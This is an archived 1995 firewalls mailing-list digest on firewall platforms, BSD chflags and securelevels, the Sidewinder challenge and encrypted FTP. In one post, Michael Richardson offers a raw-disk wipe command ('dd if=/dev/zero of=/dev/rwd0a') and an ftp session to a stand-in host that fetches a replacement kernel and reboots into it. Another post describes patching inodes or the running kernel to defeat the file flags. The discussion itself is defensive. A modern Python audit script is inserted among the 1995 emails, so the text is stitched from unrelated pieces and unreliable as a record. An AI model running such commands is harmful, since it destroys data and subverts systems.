Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Tue, 8 Aug 1995, Doug Hughes wrote:
>
> It sends out messages at auth.notice. Your syslog.conf should use
> this facility.level to do what you want with them. You can also change
> it easily in the source in two places. (where it says LOG_AUTH|LOG_NOTICE)
> If you have any more usage questions, you're probably best off asking
> me directly, since usage of it is not yet what you would call wide-spread.
:)

> Excuse me, but could you tell me what programs you are talking about?

From firewalls-owner Wed Aug 9 16:00:33 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA17936 for firewalls-outgoing; Wed, 9 Aug 1995 14:33:19 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA17913 for ; Wed, 9 Aug 1995 14:33:14 -0700
Received: from beach.sctc.com(192.55.214.50) by miles via smap (V1.3) id sma017906; Wed Aug 9 14:32:27 1995
Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id QAA21588 for ; Wed, 9 Aug 1995 16:38:17 -0500
Received: from spirit.sctc.com (spirit.sctc.com [172.17.192.76]) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id QAA21584 for ; Wed, 9 Aug 1995 16:38:16 -0500
Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id QAA16409; Wed, 9 Aug 1995 16:31:19 -0500
Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id QAA05680; Wed, 9 Aug 1995 16:31:17 -0500
Date: Wed, 9 Aug 1995 16:31:17 -0500
From: Rick Smith
Message-Id: <199508092131.QAA05680@shade.sctc.com>
To: firewalls@greatcircle.com
Cc: smith@sctc.com
Subject: Re: s[id]ewinder
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Michael writes:
>... There was a message in February or March on the mailing
>list for sidewinder attackers that announced someone did meet the
>challenge and break into the second machine. They had added some code
>to telnet, but I don't remember offhand exactly what it did.

This is the weird part about having a challenge site. There are almost as many rumors of successful attacks as there are unsuccessful attacks (thousands, it would seem). I don't remember seeing any messages about this attack. I follow "sneakers" pretty closely, and that's the only mailing list I know of about challenge site attacks. If anyone has a copy of such a message I'd love to see it.
The Challenge is to break through the firewall and extract a message stored on the challenge site's LAN. I've never seen anyone broadcast a copy of the message, so I doubt anyone has really managed to reach it. We do hear third hand reports of "consultants" and sales droids who claim to have broken Sidewinder so they can sell some snake oil.

We *did* give out a jacket once to someone who did something truly inspired (used mknod to construct an alternative path to the disk drive) even though the guy didn't reach the internal net. Of course, we fixed that bug. It's written up in Dan's paper for the next CSAC.

Rick.
smith@sctc.com
secure computing corporation

From firewalls-owner Wed Aug 9 16:20:29 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA21040 for firewalls-outgoing; Wed, 9 Aug 1995 15:42:05 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA21025 for ; Wed, 9 Aug 1995 15:42:02 -0700
Received: from citecuh.citec.qld.gov.au(203.5.10.10) by miles via smap (V1.3) id sma021007; Wed Aug 9 15:41:22 1995
Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.6.10/8.6.10) id IAA05783; Thu, 10 Aug 1995 08:35:45 +1000
Received: from citecub.citec.qld.gov.au(131.242.4.98) by citecuh.citec.qld.gov.au via smap (V1.3) id /mail/incoming/sma005781; Thu Aug 10 08:35:31 1995
Received: by citecub.citec.qld.gov.au (5.0/SMI-SVR4) id AA13799; Thu, 10 Aug 1995 08:40:27 +1000
From: sgcccdc@citec.qld.gov.au (Colin Campbell)
Message-Id: <9508092240.AA13799@citecub.citec.qld.gov.au>
Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls
To: gaarder@actech.com (Steve Gaarder)
Date: Thu, 10 Aug 95 8:40:27 EST
Cc: firewalls@GreatCircle.COM
In-Reply-To: <8k_AHFr6_EEC0YCrk0@ovid>; from "Steve Gaarder" at Aug 9, 95 10:23 am
X-Mailer: ELM [version 2.3 PL11]
content-length: 1687
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi,

You forgot BSD on SPARC :-).
I have done SunOS/SPARC and BSDI/Intel (80585.99999:-). Of the two, I guess I would have to opt for BSDI (SPARC or Intel) because of the extra security features:

0. run states
   The machine is in one of three run states which are more or less security levels. The higher the state the more the security. Levels can only be increased without rebooting to a lower level.

1. the immutability of devices in certain run states
   Disk drives become unwritable other than through the filesystem (ie no write to /dev/rsdxx).

2. the `chflags' command which sets low level protection that overrides the Unix standard chmod type protection. For example: files can be made
   - read only - they cannot be changed, even by root, while the machine is in a high run level (regardless of permissions)
   - append only (great for log files)

Sounds to me like all good things for a firewall.

Oh yeah, you can also get source and turn off all the nasty things you want, like IP-FORWARDING and IP-SOURCE-ROUTING.

Colin

>
> I'm planning to build a dual-homed gateway using TIS's toolkit. I have
> two choices for hardware platform: a Sparcstation 2 running SunOS 4 or
> Solaris 2 or an Intel box running BSD. BSD has the drawback that I'm
> not familiar with it; SunOS 4 has the drawback that source routing is
> impossible (or just hard?) to disable; Solaris 2 has relatively few
> packages ported to it.
>
> Which do you think is best for this application?
>
> thanks,
>
> Steven Gaarder          Network and Systems Administrator
> gaarder@actech.com      A C Technology, Ithaca, N.Y., USA
>

From firewalls-owner Wed Aug 9 16:30:20 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA24084 for firewalls-outgoing; Wed, 9 Aug 1995 16:28:21 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA23996 for ; Wed, 9 Aug 1995 16:28:08 -0700
Message-Id: <199508092328.QAA23996@miles.greatcircle.com>
Received: from ken.canbtimes.com.au(203.5.63.1) by miles via smap (V1.3) id sma023972; Wed Aug 9 16:27:38 1995
Received: by ken.canbtimes.com.au (1.37.109.11/16.2) id AA234520728; Thu, 10 Aug 1995 09:25:28 +1000
From: John Cougar
Subject: Sample Security Policy?
To: snd1pmf@snd10.med.navy.mil
Date: Thu, 10 Aug 95 9:25:27 EST
Cc: firewalls@GreatCircle.com
Mailer: Elm [revision: 70.85.2.1]
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hey Pat

give away a copy of an organisation's Security Policy?!? Not only must you be kidding, but also: fat chance. That'd be as negligent as giving away company trade secrets!

You can, however, get more than enough info. from the RFC 1244, available at any number of archives. Try an archie server near you someplace. You'll also want copies of the DoD Orange Book, and Cheswick and Bellovin's "Firewalls and Internet Security - repelling the wily hacker". The latter will cost you - ISBN: 0-201-63357-4. The RFC 1244 (circa 1991) is entitled "The Site Security Handbook" and is edited by Holbrook and Reynolds.

--
----------------------------------------------------------------------
John Cougar                     | email: johnc@canbtimes.com.au
Systems Consultant              | voice: ++ 61 6 280 2128
Australian Technology Resources | mobile: ++ 61 018 488867
                                | fax: ++ 61 6 280 5420
----------------------------------------------------------------------
"Modern" - what an archaic term ...
From firewalls-owner Wed Aug 9 17:01:11 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA23104 for firewalls-outgoing; Wed, 9 Aug 1995 16:16:50 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA23022 for ; Wed, 9 Aug 1995 16:16:37 -0700
Received: from milkyway.com(198.53.167.2) by miles via smap (V1.3) id smaa22998; Wed Aug 9 16:15:51 1995
Received: from jupiter.milkyway.com (jupiter.milkyway.com [192.168.77.9]) by internet with ESMTP (DuhMail/2.0) id TAB06400; Wed, 9 Aug 1995 19:16:29 -0400
Received: from metis.milkyway.com (mcr@metis.milkyway.com [192.168.77.21]) by jupiter.milkyway.com (8.6.12/8.6.12) with ESMTP id TAA28508 for ; Wed, 9 Aug 1995 19:11:40 -0400
Received: by metis.milkyway.com (8.6.9/BSDI-Client) id TAA02110; Wed, 9 Aug 1995 19:23:47 -0400
To: firewalls@GreatCircle.COM
Path: not-for-mail
From: mcr@milkyway.com (Michael Richardson)
Newsgroups: milkyway.mail.firewalls
Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls
Date: 9 Aug 1995 19:23:46 -0400
Organization: Milkyway Networks Corporation, Ottawa, ON
Lines: 31
Distribution: milkyway
Message-ID: <40bg22$21s@metis.milkyway.com>
References: <8k_AHFr6_EEC0YCrk0@ovid> <9508091811.AA19205@cseic.saic.com>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In article <9508091811.AA19205@cseic.saic.com>, Stephen Harold Goldstein wrote:
> 1) Its chflags command which can set files as append-only (sappnd) or
> "immutable" (schg). With these additional features prudently
> applied to critical files, even if root were compromised, the intruder
> would be unable to (a) erase any logs that tracked his actions (b)
> replace things like /bin/login with a hacked version, etc.

Uh...
	dd if=/dev/zero of=/dev/rwd0a

Or...
	ftp foo.bar
	cd /
	get bsd
	quit
	reboot

> least two reasonably respected commercial firewalls - TIS and
> Borderware (though I believe each has performed their own "hardening"

As well as Black Hole.
>Anyone know of a way an intruder might induce "insecure" mode while in
>multi-user mode?

Only pid=1 can change the security mode, and stock /sbin/init only does that in "single user mode"

--
:!mcr!:             | Milkyway Networks Corporation
Michael Richardson  | Makers of the Black Hole firewall
NCF: aa714 || xx714 | +1 613 566-4574 ... mcr@milkyway.com
Home: mcr@sandelman.ocunix.on.ca. PGP key available.

From firewalls-owner Wed Aug 9 17:22:27 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA22436 for firewalls-outgoing; Wed, 9 Aug 1995 16:08:31 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA22383 for ; Wed, 9 Aug 1995 16:08:21 -0700
Received: from milkyway.com(198.53.167.2) by miles via smap (V1.3) id sma022333; Wed Aug 9 16:07:55 1995
Received: from jupiter.milkyway.com (jupiter.milkyway.com [192.168.77.9]) by internet with ESMTP (DuhMail/2.0) id TAA06380; Wed, 9 Aug 1995 19:08:28 -0400
Received: from metis.milkyway.com (mcr@metis.milkyway.com [192.168.77.21]) by jupiter.milkyway.com (8.6.12/8.6.12) with ESMTP id TAA28448 for ; Wed, 9 Aug 1995 19:04:35 -0400
Received: by metis.milkyway.com (8.6.9/BSDI-Client) id TAA02042; Wed, 9 Aug 1995 19:16:42 -0400
To: firewalls@greatcircle.com
Path: not-for-mail
From: mcr@milkyway.com (Michael Richardson)
Newsgroups: milkyway.mail.firewalls
Subject: Re: Multilevel Security is good for firewalls
Date: 9 Aug 1995 19:16:39 -0400
Organization: Milkyway Networks Corporation, Ottawa, ON
Lines: 42
Distribution: milkyway
Message-ID: <40bfkn$1vo@metis.milkyway.com>
References: <9508082241.AA10124@ig1.att.att.com>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In article <9508082241.AA10124@ig1.att.att.com>, wrote:
>So B1 is a great addition for protecting the firewall itself from
>attack. How does that help you build a better firewall? It gives you
>a trusted host on which to build your firewall application/relay/circuit.
>A broken firewall is a terrible liability, there goes all of that
>virtual private network encryption! .. there goes all of your
>company's data! ..what a nice place to sit and watch whatever your
>company accesses over the net!

As several have pointed out: who cares if the firewall is safe if the internal network is not. Firewalls are *NOT* general purpose computing engines. Padgett has suggested building firewalls out of 386SXs: one for each proxy service!

The compartments sound very nice when you have users that could potentially do things. Firewalls do not. They have network connections and must protect themselves from attack. Find a commercial firewall that has either rlogind or telnetd running anywhere!

Meanwhile, we have customers struggling to define a sane security policy, complaining that "talk" doesn't work (needs UDP), asking "why do I need an internal DNS?", "where do dial in modems go?"

B1-certified is over-engineered for the task. The only nice thing is the comprehensive auditing available, but most customers are not willing to dedicate some kind of write-once media to keep good, solid logs anyway.

>Even if the firewall functions perfectly, you may have
>security problems because you perfectly pass some insecure protocol
>thru the firewall. So, you need B1 internally as well to be perfect.

--
:!mcr!:             | Milkyway Networks Corporation
Michael Richardson  | Makers of the Black Hole firewall
NCF: aa714 || xx714 | +1 613 566-4574 ... mcr@milkyway.com
Home: mcr@sandelman.ocunix.on.ca. PGP key available.
From firewalls-owner Wed Aug 9 17:30:23 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA27568 for firewalls-outgoing; Wed, 9 Aug 1995 17:04:36 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA27543 for ; Wed, 9 Aug 1995 17:04:32 -0700
Received: from nsco.network.com(129.191.1.1) by miles via smap (V1.3) id sma027497; Wed Aug 9 17:03:40 1995
Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA10006; Wed, 9 Aug 95 19:21:52 CDT
Received: by mnbp.network.com with Microsoft Mail id <30294C68@mnbp.network.com>; Wed, 09 Aug 95 19:01:44 CDT
From: Greg Brennan
To: firewalls mailing list
Subject: FW: Encripted ftp connections
Date: Wed, 09 Aug 95 19:00:00 CDT
Message-Id: <30294C68@mnbp.network.com>
Encoding: 66 TEXT
X-Mailer: Microsoft Mail V3.0
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Lyndon asked:
>I have been tasked with setting up an ftp server to
>communicate with a handful of business partners....
>... Due to the
>nature of the data the data must be encrypted as it passes
>over the Internet and strong authentication must be used
>when they connect.
>
>This is a commercial project and the data will cross
>International boundaries, for this reason I do not want
>to use encryption technology such as pgp as some of the
>countries will have problems with this.
>
>I see two solutions, to encrypt the data, a hardware
>encryption device is placed at each remote site so that
>the data is encrypted between the remote and local machine
>or mandate in the security policy that the data is encrypted
>before it is transmitted. In either case the strong
>authentication could be done with one time hand held
>authentication devices.
>
>Questions:
>
>Does anyone know of a hardware solution that can operate
>between one local machine and 5 or 6 remote machines?
>
>
>If encryption of the data before transmission is mandated
>what commercial encryption can be used that will be
>acceptable across International borders and can anyone
>think of a method where if someone forgot to encrypt the
>data before transmission this would be caught and the
>transfer stopped?

The Security Router from Network Systems will allow this:

Data Privacy Facility (DPF) is NSC's cryptographic offering. One of the encryption algorithms it supports is NSC1, which is exportable. (DES, Triple DES, and IDEA are also available but may not be exportable.) DPF will also provide strong authentication between sites (a la RSA and Diffie Hellman).

The second package is NSC's packet filtering software - Packet Control Facility (or PCF). Since PCF is capable of sorting data into various classes (based on address, application etc.) it has the capability to ensure that all data leaving your FTP server that is destined for the other sites will be encrypted. Other data, or data destined for other locations on the internet that doesn't have to be encrypted, will go as usual.

More information is available on these and other network security tools on Network Systems' home page at http://www.network.com

Sincerely,
Greg Brennan

________________________________
Greg Brennan                         | Network Systems Corp. (Canadian Office)
Manager, Business Partner Solutions  | 5710 Timberlea Blvd., Suite 207
Internet: greg.brennan@network.com   | Mississauga, Ontario L4W 4W1
Voice: (905) 629-0440                | "Secure Networks-On-Demand"TM
Fax: (905) 629-0435                  | http://www.network.com

From firewalls-owner Wed Aug 9 17:59:33 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA28875 for firewalls-outgoing; Wed, 9 Aug 1995 17:25:05 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA28810 for ; Wed, 9 Aug 1995 17:24:55 -0700
Received: from gw2.att.com(192.20.239.134) by miles via smap (V1.3) id sma028775; Wed Aug 9 17:23:59 1995
Received: from vodka.sse.att.com by ig1.att.att.com id AA00776; Wed, 9 Aug 95 17:26:14 EDT
Message-Id: <9508092126.AA00776@ig1.att.att.com>
From: mdr@vodka.sse.att.com
Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls
To: steveg@cseic.saic.com (Stephen Harold Goldstein)
Date: Wed, 9 Aug 1995 17:27:59 -0400 (EDT)
Cc: firewalls@greatcircle.com
In-Reply-To: <9508091811.AA19205@cseic.saic.com> from "Stephen Harold Goldstein" at Aug 9, 95 02:11:51 pm
X-Mailer: ELM [version 2.4 PL23-upenn2.7]
Mime-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Steve,

> Steve Gaarder writes:
>
> My vote (with 1 reservation - see below) would be for BSD for at least two
> reasons:
>
> 1) Its chflags command which can set files as append-only (sappnd) or
> "immutable" (schg). With these additional features prudently
> applied to critical files, even if root were compromised, the intruder
> would be unable to (a) erase any logs that tracked his actions (b)
> replace things like /bin/login with a hacked version, etc.
...
>
> As for (1), in theory these flags can only be changed when the box is
> in single user mode, but the man page for chflags seems to imply there
> may be another way:
>
> "If either or both of sappnd or schg is set, however, not even the
> super-user can change the flags unless the system is in ``insecure'' mode
> (typically, single user). The user flags can be set by the owner or the
> super-user; the system flags can only be set by the super-user."
>
> Anyone know of a way an intruder might induce "insecure" mode while in
> multi-user mode?
>

I don't know how BSD implements the sappnd or schg features for files. But if it involves permission bits or other data in the inode of the file, then it may be possible for a root user to change the inode's contents by seeking to the appropriate spot on the block or raw device and updating the inode. That may sound hard to do, but it's not.

Alternatively, root can patch /unix or the running system image to ignore the bits wherever they may be stored. Basically just replace part of the code in the function that does the check with an early return or jump or register set.

Any BSD gurus out there?
Mark Riggins
Secure Systems Engineering
AT&T Bell Labs

From firewalls-owner Wed Aug 9 18:51:42 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA01831 for firewalls-outgoing; Wed, 9 Aug 1995 18:23:42 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA01754 for ; Wed, 9 Aug 1995 18:23:32 -0700
Received: from citecuh.citec.qld.gov.au(203.5.10.10) by miles via smap (V1.3) id sma001727; Wed Aug 9 18:22:33 1995
Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.6.10/8.6.10) id LAA00508; Thu, 10 Aug 1995 11:17:14 +1000
Received: from citecub.citec.qld.gov.au(131.242.4.98) by citecuh.citec.qld.gov.au via smap (V1.3) id /mail/incoming/sma000501; Thu Aug 10 11:16:57 1995
Received: by citecub.citec.qld.gov.au (5.0/SMI-SVR4) id AA11552; Thu, 10 Aug 1995 11:22:00 +1000
From: sgcccdc@citec.qld.gov.au (Colin Campbell)
Message-Id: <9508100122.AA11552@citecub.citec.qld.gov.au>
Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls
To: mcr@milkyway.com (Michael Richardson)
Date: Thu, 10 Aug 95 11:21:56 EST
Cc: firewalls@GreatCircle.COM
In-Reply-To: <40bg22$21s@metis.milkyway.com>; from "Michael Richardson" at Aug 9, 95 7:23 pm
X-Mailer: ELM [version 2.3 PL11]
content-length: 796
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>
> In article <9508091811.AA19205@cseic.saic.com>,
> Stephen Harold Goldstein wrote:
> > 1) Its chflags command which can set files as append-only (sappnd) or
> > "immutable" (schg). With these additional features prudently
> > applied to critical files, even if root were compromised, the intruder
> > would be unable to (a) erase any logs that tracked his actions (b)
> > replace things like /bin/login with a hacked version, etc.
>
> Uh... dd if=/dev/zero of=/dev/rwd0a

Feel free to correct me if I am wrong, but I recall reading that in run state 2 I believe the raw disks to not be writable.

> Or... ftp foo.bar
> cd /
> get bsd
> quit
> reboot

If /bsd is marked immutable, then not even root can overwrite it.

Colin

From firewalls-owner Wed Aug 9 19:03:33 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA02319 for firewalls-outgoing; Wed, 9 Aug 1995 18:38:44 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA02303 for ; Wed, 9 Aug 1995 18:38:42 -0700
Received: from ns.gbnet.net(194.70.126.10) by miles via smap (V1.3) id sma002298; Wed Aug 9 18:38:21 1995
Received: (from jrg@localhost) by ns.gbnet.net (8.7.Beta.10/8.6.12) id CAA15568; Thu, 10 Aug 1995 02:36:46 +0100 (BST)
Date: Thu, 10 Aug 1995 02:36:46 +0100 (BST)
From: James R Grinter
Message-Id: <199508100136.CAA15568@ns.gbnet.net>
X-Subliminal: H is for Hypertext
X-Mailer: Mail User's Shell (7.2.5 10/14/92)
To: mcr@milkyway.com (Michael Richardson), firewalls@GreatCircle.COM
Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Thu 10 Aug, 1995, mcr@milkyway.com (Michael Richardson) wrote:
> Uh... dd if=/dev/zero of=/dev/rwd0a

As I recall, in BSD security level 2, you can't raw read/write the devices.

> Or... ftp foo.bar
> cd /
> get bsd

make the kernel file immutable. You should notice if your machine rebooted and you didn't ask it to.

> Only pid=1 can change the security mode, and stock /sbin/init
>only does that in "single user mode"

yup. Not sure what you do to stop someone patching the incore memory. Does it stop you editing that too? Probably...

James.
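The chflags/securelevel exchange above (Colin's run states, Goldstein's sappnd/schg proposal, Richardson's dd and ftp rejoinders, Riggins' inode question, and the replies from Colin and James) comes down to two things an administrator can verify on the firewall host itself: that the critical files actually carry the system flags, and that the security level is high enough for those flags to bind root at all. The Python below is an added example written for this digest, not code from anyone in the thread. It parses text in the shape of `sysctl kern.securelevel` and `ls -lo` output (constructed sample output is embedded so it runs offline) and reports any file lacking its required flag, plus a securelevel too low to enforce them. The required-flags policy, the file list, the enforcing level, and the `ls -lo` column layout (flags column between group and size, `-` when none, comma-separated otherwise) are my assumptions; check the layout against ls(1) on your own system before trusting the parser.

```python
"""Audit chflags protections on a BSD firewall host against a required-flags policy.

Constructed example: parses text shaped like `sysctl kern.securelevel` and
`ls -lo` output instead of running the commands, so it runs anywhere.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Policy (assumed for illustration): which system flag each critical file needs.
# schg = immutable (kernel, login binary); sappnd = append-only (logs).
REQUIRED_FLAGS = {
    "/bsd": "schg",
    "/bin/login": "schg",
    "/var/log/authlog": "sappnd",
    "/var/log/messages": "sappnd",
}

# Assumption drawn from the thread: schg/sappnd only bind the superuser once
# the system is in 'secure' mode, i.e. kern.securelevel >= 1.
MIN_ENFORCING_LEVEL = 1


@dataclass(frozen=True)
class Entry:
    path: str
    flags: frozenset[str]


def parse_securelevel(text: str) -> int:
    """Extract N from `kern.securelevel = N` (or `kern.securelevel: N`)."""
    m = re.search(r"kern\.securelevel\s*[=:]\s*(-?\d+)", text)
    if m is None:
        raise ValueError("no kern.securelevel in sysctl output")
    return int(m.group(1))


def parse_ls_lo(text: str) -> dict[str, Entry]:
    """Parse `ls -lo` lines. Assumed column layout (verify with ls(1)):
    mode links owner group flags size month day year-or-time path
    The flags column is '-' when no flags are set, else a comma list."""
    entries: dict[str, Entry] = {}
    for line in text.splitlines():
        parts = line.split(None, 9)
        if len(parts) != 10 or not parts[0].startswith(("-", "d", "l")):
            continue  # skips 'total N', blank lines and anything malformed
        flags_field, path = parts[4], parts[9]
        flags = frozenset() if flags_field == "-" else frozenset(flags_field.split(","))
        entries[path] = Entry(path, flags)
    return entries


def audit(securelevel: int, entries: dict[str, Entry],
          policy: dict[str, str] = REQUIRED_FLAGS) -> list[str]:
    """Return one finding per problem; an empty list means the host complies."""
    findings: list[str] = []
    if securelevel < MIN_ENFORCING_LEVEL:
        findings.append(
            f"kern.securelevel={securelevel}: schg/sappnd are not enforced "
            f"against root; raise to >= {MIN_ENFORCING_LEVEL}")
    for path, needed in sorted(policy.items()):
        entry = entries.get(path)
        if entry is None:
            findings.append(f"{path}: not present in ls -lo output")
        elif needed not in entry.flags:
            have = ",".join(sorted(entry.flags)) or "-"
            findings.append(f"{path}: has flags [{have}], needs {needed}")
    return findings


# Constructed sample output standing in for the real commands.
SAMPLE_SYSCTL = "kern.securelevel = 1\n"
SAMPLE_LS_LO = """\
-r-xr-xr-x  1 root  wheel  schg 2106216 Aug  9  1995 /bsd
-r-sr-xr-x  1 root  bin    - 20480 Aug  9  1995 /bin/login
-rw-r-----  1 root  wheel  sappnd,nodump 40960 Aug  9  1995 /var/log/authlog
"""

if __name__ == "__main__":
    level = parse_securelevel(SAMPLE_SYSCTL)
    for finding in audit(level, parse_ls_lo(SAMPLE_LS_LO)):
        print("FINDING:", finding)
```

On a real host, feed it the output of `sysctl kern.securelevel` and `ls -lo` over the files named in the policy; the sample run flags /bin/login (no flags at all) and /var/log/messages (absent from the listing). It deliberately does not claim anything about James's question of patching kernel memory, which no flag on a file can address.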
From firewalls-owner Wed Aug 9 19:30:05 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA02564 for firewalls-outgoing; Wed, 9 Aug 1995 18:52:45 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA02548 for ; Wed, 9 Aug 1995 18:52:42 -0700
Received: from sam.comms.unsw.edu.au(149.171.96.20) by miles via smap (V1.3) id sma002533; Wed Aug 9 18:51:59 1995
Received: from atlas.turbosoft.com.au (atlas.turbosoft.com.au [203.10.16.38]) by sam.comms.unsw.EDU.AU (8.6.9/8.6.9.kenso-central) with SMTP id LAA24157; Thu, 10 Aug 1995 11:42:30 +1000
Received: from by atlas.turbosoft.com.au (4.1/TS-0.7) id AB11222; Thu, 10 Aug 95 12:04:46 EST
Message-Id: <9508100204.AB11222@atlas.turbosoft.com.au>
Comments: Authenticated sender is
From: "Paul Brooks"
Organization: TurboSoft Pty. Ltd.
To: millar@pobox.upenn.edu, firewalls@greatcircle.com
Date: Thu, 10 Aug 1995 11:47:50 +1000
Subject: Re: Host protection with ipfilterd?
Reply-To: paul@turbosoft.com.au
Priority: normal
X-Mailer: Pegasus Mail for Windows (v2.01)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>Someone has asked me if it is appropriate to use ipfilterd to filter access
>to their SGI host residing on a campus subnet. My take on it is that
>ipfilterd is appropriate if you want to dedicate your SGI as a router to
>filter packets between an internal subnet and an external network/subnet,
>but that it is not the right tool for protecting the SGI host *itself*.
>Seems to me like tcp wrappers and portmapper are the proper tools for
>host-based filtering

I use ipfilterd here to protect the gateway host, because unlike screend it can have rules specified on particular ports - so it can protect against source address spoofing, which screend cannot. Effectively, this allows you to draw the 'firewall boundary line' at the incoming interface, with the gateway host 'inside' the line.
Tcp-wrappers etc should be used as well - relying on a single layer is silly.

Another reason is I couldn't find the SunOS source to allow screend to be installed.

-------
Paul Brooks (PB94)        | paul@turbosoft.com.au     | Ssshhh:
Network Specialist        | pwb@newt.phys.unsw.edu.au | We're hunting
TurboSoft Pty Ltd         |                           | wabbits (in
579 Harris St., Ultimo    | Ph : +61 2 281 3155       | Centennial Park) !
Sydney Australia 2007     | Fax: +61 2 281 3350       |

From firewalls-owner Wed Aug 9 21:31:54 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA08565 for firewalls-outgoing; Wed, 9 Aug 1995 21:19:49 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA08549 for ; Wed, 9 Aug 1995 21:19:45 -0700
Received: from citecuh.citec.qld.gov.au(203.5.10.10) by miles via smap (V1.3) id sma008540; Wed Aug 9 21:18:56 1995
Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.6.10/8.6.10) id OAA05805 for ; Thu, 10 Aug 1995 14:13:33 +1000
Received: from citecub.citec.qld.gov.au(131.242.4.98) by citecuh.citec.qld.gov.au via smap (V1.3) id /mail/incoming/sma005795; Thu Aug 10 14:13:03 1995
Received: by citecub.citec.qld.gov.au (5.0/SMI-SVR4) id AA11344; Thu, 10 Aug 1995 14:18:05 +1000
From: sgcccdc@citec.qld.gov.au (Colin Campbell)
Message-Id: <9508100418.AA11344@citecub.citec.qld.gov.au>
Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls
To: firewalls@GreatCircle.COM
Date: Thu, 10 Aug 95 14:18:04 EST
X-Mailer: ELM [version 2.3 PL11]
content-length: 1238
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi,

Perhaps I can put the BSD part of this thread to sleep, immutably :-). I quote from the BSD/OS book (page 90).

------------
Security levels

BSD/OS V2.0 has a notion of a security level; see init(8). By default, the system goes to a `secure' mode when multi-user. In that mode, /dev/kmem and /dev/mem cannot be written, raw disks cannot be written and immutable files cannot be written - even by the superuser.
(See chflags(1) for information on flags including the immutable flags - which can only be changed in not-secure mode.)

The modes are:

-1 - 'Permanently Insecure' - 'Insecure' and even multi-user mode is 'insecure'.
 0 - 'Insecure' - In single user mode, root can change flags and read/write any file - multi-user mode automatically moves to 'secure'.
 1 - 'Secure' - can not write immutable files or raw devices or /dev/kmem
 2 - highly secure - 'Secure' and disk devices are not writable through /dev - newfs and floppy writing disabled

Disable automatic activation of these security features by recompiling the kernel with the 'INSECURE' flag set. You can still manually change security levels using sysctl(8).
------------

Thus endeth the lesson :-)

Colin

From firewalls-owner Wed Aug 9 23:30:06 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA10306 for firewalls-outgoing; Wed, 9 Aug 1995 23:27:53 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA10298 for ; Wed, 9 Aug 1995 23:27:51 -0700
Message-Id: <199508100627.XAA10298@miles.greatcircle.com>
Received: from ibmmail.com(199.171.26.3) by miles via smap (V1.3) id sma010295; Wed Aug 9 23:26:50 1995
Received: from ibmmail by ibmmail.COM (IBM VM SMTP V2R2) with BSMTP id 7100; Wed, 09 Aug 95 23:43:08 EDT
Date: Wed, 09 Aug 1995 23:46:35 EDT
From: "George Janczuk JZKGEQ - AMPLN1"
To: Stephen.M.Crane@jci.com
Cc: firewalls@greatcircle.com
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Subject: RE: SECURITY
